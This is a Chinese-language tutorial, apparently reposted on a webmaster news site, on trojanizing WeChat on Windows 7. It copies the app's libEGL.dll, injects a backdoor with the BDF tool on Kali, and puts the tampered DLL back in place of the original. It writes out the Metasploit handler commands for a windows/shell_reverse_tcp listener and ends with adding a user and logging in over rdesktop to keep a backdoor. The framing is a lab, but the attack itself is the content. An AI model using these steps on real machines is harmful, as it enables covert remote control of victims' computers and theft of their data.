设为首页 - 加入收藏 ASP站长网(Aspzz.Cn)- 科技、建站、经验、云计算、5G、大数据,站长网!
热搜: 创业者 手机 数据
当前位置: 首页 > 服务器 > 系统 > 正文

微信DLL劫持反弹shell

发布时间:2021-01-07 16:09 所属栏目:52 来源:网络整理
导读:一、操作环境 Windows7 :? 微信? , Process Explorer(任务管理工具,本实验中用于查找微信程序调用的DLL文件) Kali Linux? :? BDF(劫持工具,可用于DLL注入) 可以互相ping通 二、操作步骤 Step1:在win7中打开微信和Process Explorer,在Process Expl

一、操作环境

  Windows7 :? 微信? , Process Explorer(任务管理工具,本实验中用于查找微信程序调用的DLL文件)

  Kali Linux? :? BDF(劫持工具,可用于DLL注入)

  可以互相ping通

二、操作步骤

  Step1:在win7中打开微信和Process Explorer,在Process Explorer中找到微信进程,再找到微信调用的DLL文件,如:libEGL.dll

微信DLL劫持反弹shell

微信DLL劫持反弹shell

?  Step2:将该文件拷贝到Kali的BDF工具目录下;

微信DLL劫持反弹shell

?  Step3:运行backdoor.py,向libEGL.dll中注入

微信DLL劫持反弹shell

?

微信DLL劫持反弹shell

微信DLL劫持反弹shell

?  Step4:将注入完成的文件拷贝到win7微信的原位置,替换掉原文件,记得先关闭微信;

微信DLL劫持反弹shell

?  Step5:在Kali开启postgresql,运行MSF;

service postgresql start
msfconsole
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/shell_reverse_tcp 
msf5 exploit(multi/handler) > show options
msf5 exploit(multi/handler) > set lhost kali的IP
msf5 exploit(multi/handler) > set lport 6666
msf5 exploit(multi/handler) > run

  Step6:在win7中运行微信;

微信DLL劫持反弹shell

?  Step7:添加用户,在Kali使用rdesktop远程登陆win7。

微信DLL劫持反弹shell

微信DLL劫持反弹shell

?至此,便在win7电脑留下后门。?

(编辑:ASP站长网)

    网友评论
    推荐文章
      热点阅读